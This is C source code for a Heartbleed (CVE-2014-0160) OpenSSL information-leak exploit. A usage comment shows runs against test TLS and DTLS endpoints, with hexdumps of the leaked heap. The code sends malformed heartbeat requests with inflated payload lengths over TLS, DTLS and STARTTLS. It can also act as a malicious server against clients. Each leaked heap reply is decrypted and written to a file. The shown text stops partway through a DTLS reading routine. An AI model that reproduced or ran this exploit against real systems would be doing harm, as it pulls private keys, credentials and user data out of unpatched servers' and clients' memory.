* use -u switch, tested against s_server/s_client version 1.0.1d
*
* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1
* ...
* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=1392
* [ decrypting SSL packet
* [ heartbleed leaked length=1336
* [ final record type=24, length=1355
* [ wrote 1352 bytes of heap to file 'eshta'
*
*
* # hexdump -C eshta
* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|
* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|
* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|
* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|
* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|
* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........|
* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|
* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|
* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|
* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|
* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|
* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|
* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|
* 0000054b
*
*
* # openssl s_client -connect localhost:990 -dtls1
* ...
* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ SSL connection using AES256-SHA
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=1392
* [ decrypting SSL packet
* [ heartbleed leaked length=1336
* [ final record type=24, length=1355
* [ wrote 1352 bytes of heap to file 'eshta'
*
*
* # hexdump -C eshta
* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|
* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|
* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|
* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|
* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\.h.|
* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|
* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|
* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|
* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|
* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|
* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|
* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|
* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|
* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|
* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|
* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|
* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|
* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |
* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|
* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|
* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|
* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|
* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|
* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\....|
* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|
* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|
* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|
* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|
* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|
* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|
* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|
* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\?...a,...|
* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|
* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|
* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|
* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|
* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|
* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|
* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|
* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|
* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|
* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|
* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|
* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|
* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|
* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|
* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|
* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\.D|
* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|
* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|
* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|
* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|
* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|
* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|
* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|
* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|
* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|
* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|
* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|
* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|
* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
* *
* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|
* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|
* 0000054b
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
(((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
int first = 0;
int leakbytes = 0;
int repeat = 1;
int badpackets = 0;
typedef struct {
int socket;
SSL *sslHandle;
SSL_CTX *sslContext;
} connection;
typedef struct {
unsigned char type;
short version;
unsigned int length;
unsigned char hbtype;
unsigned int payload_length;
void* payload;
} heartbeat;
void ssl_init();
void usage();
int tcp_connect(char*,int);
int tcp_bind(char*, int);
connection* tls_connect(int);
connection* tls_bind(int);
int pre_cmd(int,int,int);
void* heartbleed(connection* ,unsigned int);
void* sneakyleaky(connection* ,char*, int);
static DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);
static int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);
static int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);
static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);
int tcp_connect(char* server,int port){
int sd,ret;
struct hostent *host;
struct sockaddr_in sa;
host = gethostbyname(server);
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = *((struct in_addr *) host->h_addr);
bzero(&(sa.sin_zero),8);
printf("[ connecting to %s %d/tcp\n",server,port);
ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
if(ret==0){
printf("[ connected to %s %d/tcp\n",server,port);
}
else{
printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
exit(0);
}
return sd;
}
int tcp_bind(char* server, int port){
int sd, ret, val=1;
struct sockaddr_in sin;
struct hostent *host;
host = gethostbyname(server);
sd=socket(AF_INET,SOCK_STREAM,0);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
memset(&sin,0,sizeof(sin));
sin.sin_addr=*((struct in_addr *) host->h_addr);
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
if(ret==-1){
printf("[!] cannot bind socket\n");
exit(0);
}
listen(sd,5);
return(sd);
}
connection* dtls_server(int sd, char* server,int port){
int bytes;
connection *c;
char* buf;
buf = malloc(4096);
int ret;
struct hostent *host;
struct sockaddr_in sa;
unsigned long addr;
if ((host = gethostbyname(server)) == NULL) {
perror("gethostbyname");
exit(1);
}
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = *((struct in_addr *) host->h_addr);
if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
perror("bind()");
exit(1);
}
BIO *bio;
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buf,0,4096);
c = malloc(sizeof(connection));
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(DTLSv1_server_method());
SSL_CTX_set_read_ahead (c->sslContext, 1);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
SSL_CTX_SRP_CTX_init(c->sslContext);
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
if(!SSL_CTX_check_private_key(c->sslContext)){
printf("[!] FATAL: private key does not match the certificate public key\n");
exit(0);
}
c->sslHandle = SSL_new(c->sslContext);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
if(!SSL_set_fd(c->sslHandle,c->socket))
ERR_print_errors_fp(stderr);
bio = BIO_new_dgram(sd, BIO_NOCLOSE);
SSL_set_bio(c->sslHandle, bio, bio);
SSL_set_accept_state (c->sslHandle);
int rc = SSL_accept(c->sslHandle);
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
// bytes = SSL_read(c->sslHandle, buf, 4095);
// printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
}
return c;
}
void ssl_init(){
SSL_load_error_strings();
SSL_library_init();
OpenSSL_add_all_digests();
OpenSSL_add_all_algorithms();
OpenSSL_add_all_ciphers();
}
connection* tls_connect(int sd){
connection *c;
c = malloc(sizeof(connection));
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
c->sslHandle = SSL_new(c->sslContext);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
if(!SSL_set_fd(c->sslHandle,c->socket))
ERR_print_errors_fp(stderr);
if(SSL_connect(c->sslHandle)!=1)
ERR_print_errors_fp(stderr);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
}
return c;
}
connection* dtls_client(int sd, char* server,int port){
int ret;
struct hostent *host;
struct sockaddr_in sa;
connection *c;
memset((char *)&sa,0,sizeof(sa));
c = malloc(sizeof(connection));
if ((host = gethostbyname(server)) == NULL) {
perror("gethostbyname");
exit(1);
}
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = *((struct in_addr *) host->h_addr);
if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {
perror("connect()");
exit(0);
}
BIO *bio;
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(DTLSv1_client_method());
SSL_CTX_set_read_ahead (c->sslContext, 1);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
c->socket = sd;
c->sslHandle = NULL;
c->sslHandle = SSL_new(c->sslContext);
SSL_set_tlsext_host_name(c->sslHandle,server);
bio = BIO_new_dgram(sd, BIO_NOCLOSE);
BIO_ctrl_set_connected(bio, 1, &sa);
SSL_set_bio(c->sslHandle, bio, bio);
SSL_set_connect_state (c->sslHandle);
//printf("eshta\n");
if(SSL_connect(c->sslHandle)!=1)
ERR_print_errors_fp(stderr);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway), %d \n",c->sslHandle->tlsext_heartbeat);
}
return c;
}
connection* tls_bind(int sd){
int bytes;
connection *c;
char* buf;
buf = malloc(4096);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buf,0,4096);
c = malloc(sizeof(connection));
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(SSLv23_server_method());
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
SSL_CTX_SRP_CTX_init(c->sslContext);
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
if(!SSL_CTX_check_private_key(c->sslContext)){
printf("[!] FATAL: private key does not match the certificate public key\n");
exit(0);
}
c->sslHandle = SSL_new(c->sslContext);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
if(!SSL_set_fd(c->sslHandle,c->socket))
ERR_print_errors_fp(stderr);
int rc = SSL_accept(c->sslHandle);
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
bytes = SSL_read(c->sslHandle, buf, 4095);
printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
}
return c;
}
int pre_cmd(int sd,int precmd,int verbose){
/* this function can be used to send commands to a plain-text
service or client before heartbleed exploit attempt. e.g. STARTTLS */
int rc, go = 0;
char* buffer;
char* line1;
char* line2;
switch(precmd){
case 0:
line1 = "EHLO test\n";
line2 = "STARTTLS\n";
break;
case 1:
line1 = "CAPA\n";
line2 = "STLS\n";
break;
case 2:
line1 = "a001 CAPB\n";
line2 = "a002 STARTTLS\n";
break;
default:
go = 1;
break;
}
if(go==0){
buffer = malloc(2049);
if(buffer==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
printf("[ banner: %s",buffer);
send(sd,line1,strlen(line1),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
send(sd,line2,strlen(line2),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
}
return sd;
}
void* heartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
p = buf;
*p++ = TLS1_HB_REQUEST;
switch(type){
case 0:
s2n(0x0,p);
break;
case 1:
s2n(0xffff,p);
break;
default:
printf("[ setting heartbeat payload_length to %u\n",type);
s2n(type,p);
break;
}
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
OPENSSL_free(buf);
return c;
}
void* dtlsheartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2 + 16);
memset(buf, '\0', sizeof buf);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
p = buf;
*p++ = TLS1_HB_REQUEST;
switch(type){
case 0:
s2n(0x0,p);
break;
case 1:
// s2n(0xffff,p);
// s2n(0x3feb,p);
s2n(0x0538,p);
break;
default:
printf("[ setting heartbeat payload_length to %u\n",type);
s2n(type,p);
break;
}
s2n(c->sslHandle->tlsext_hb_seq, p);
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);
if (ret >= 0)
{
if (c->sslHandle->msg_callback)
c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,
buf, 3 + 16,
c->sslHandle, c->sslHandle->msg_callback_arg);
dtls1_start_timer(c->sslHandle);
c->sslHandle->tlsext_hb_pending = 1;
}
OPENSSL_free(buf);
return c;
}
void* sneakyleaky(connection *c,char* filename, int verbose){
char *p;
int ssl_major,ssl_minor,al;
int enc_err,n,i;
SSL3_RECORD *rr;
SSL_SESSION *sess;
SSL* s;
unsigned char md[EVP_MAX_MD_SIZE];
short version;
unsigned mac_size, orig_len;
size_t extra;
rr= &(c->sslHandle->s3->rrec);
sess=c->sslHandle->session;
s = c->sslHandle;
if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
extra=SSL3_RT_MAX_EXTRA;
else
extra=0;
if ((s->rstate != SSL_ST_READ_BODY) ||
(s->packet_length < SSL3_RT_HEADER_LENGTH)) {
n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
if (n <= 0)
goto apple;
s->rstate=SSL_ST_READ_BODY;
p=s->packet;
rr->type= *(p++);
ssl_major= *(p++);
ssl_minor= *(p++);
version=(ssl_major<<8)|ssl_minor;
n2s(p,rr->length);
if(rr->type==24){
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
}
}
if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){
i=rr->length;
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
rr->data=rr->input;
tls1_enc(s,0);
if((sess != NULL) &&
(s->enc_read_ctx != NULL) &&
(EVP_MD_CTX_md(s->read_hash) != NULL))
{
unsigned char *mac = NULL;
unsigned char mac_tmp[EVP_MAX_MD_SIZE];
mac_size=EVP_MD_CTX_size(s->read_hash);
OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
orig_len = rr->length+((unsigned int)rr->type>>8);
if(orig_len < mac_size ||
(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
orig_len < mac_size+1)){
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
}
if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
mac = mac_tmp;
ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
rr->length -= mac_size;
}
else{
rr->length -= mac_size;
mac = &rr->data[rr->length];
}
i = tls1_mac(s,md,0);
if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
enc_err = -1;
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)
enc_err = -1;
}
if(enc_err < 0){
al=SSL_AD_BAD_RECORD_MAC;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
goto apple;
}
if(s->expand != NULL){
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
goto apple;
}
if (!ssl3_do_uncompress(s)) {
al=SSL_AD_DECOMPRESSION_FAILURE;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
goto apple;
}
}
if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
goto apple;
}
rr->off=0;
s->packet_length=0;
if(first==0){
uint heartbleed_len = 0;
char* fp = s->s3->rrec.data;
(long)fp++;
memcpy(&heartbleed_len,fp,2);
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; zlength; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
repeat = 1;
}
else{
repeat = 0;
}
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
if(first==2){
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf("[ nothing from the heap to write\n");
}
return;
apple:
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
}
void* dtlssneakyleaky(connection *c,char* filename, int verbose){
char *p;
int ssl_major,ssl_minor,al;
int enc_err,n,i;
SSL3_RECORD *rr;
SSL_SESSION *sess;
SSL* s;
DTLS1_BITMAP *bitmap;
unsigned int is_next_epoch;
unsigned char md[EVP_MAX_MD_SIZE];
short version;
unsigned int mac_size, orig_len;
rr= &(c->sslHandle->s3->rrec);
sess=c->sslHandle->session;
s = c->sslHandle;
again:
if ((s->rstate != SSL_ST_READ_BODY) ||
(s->packet_length < DTLS1_RT_HEADER_LENGTH)) {
n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
if (n <= 0)
goto apple;
s->rstate=SSL_ST_READ_BODY;
p=s->packet;
rr->type= *(p++);
ssl_major= *(p++);
ssl_minor= *(p++);
version=(ssl_major<<8)|ssl_minor;
n2s(p,rr->epoch);
memcpy(&(s->s3->read_sequence[2]), p, 6);
p+=6;
n2s(p,rr->length);
if(rr->type==24){
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
}
}
if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){
i=rr->length;
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
if ( n != i)
{
rr->length = 0;
s->packet_length = 0;
goto again;
}
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);
if ( bitmap == NULL)
{
rr->length = 0;
s->packet_length = 0;
goto again;
}
if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&
*p == SSL3_MT_CLIENT_HELLO) &&
!dtls1_record_replay_check(s, bitmap))
{
rr->length = 0;
s->packet_length=0;
goto again;
}
if (rr->length == 0) goto again;
if (is_next_epoch)
{
if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)
{
dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);
}
rr->length = 0;
s->packet_length = 0;
goto again;
}
rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);
rr->data=rr->input;
orig_len=rr->length;
dtls1_enc(s,0);
if((sess != NULL) &&
(s->enc_read_ctx != NULL) &&
(EVP_MD_CTX_md(s->read_hash) != NULL))
{
unsigned char *mac = NULL;
unsigned char mac_tmp[EVP_MAX_MD_SIZE];
mac_size=EVP_MD_CTX_size(s->read_hash);
OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
orig_len = rr->length+((unsigned int)rr->type>>8);
if(orig_len < mac_size ||
(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
orig_len < mac_size+1)){
al=SSL_AD_DECODE_ERROR;
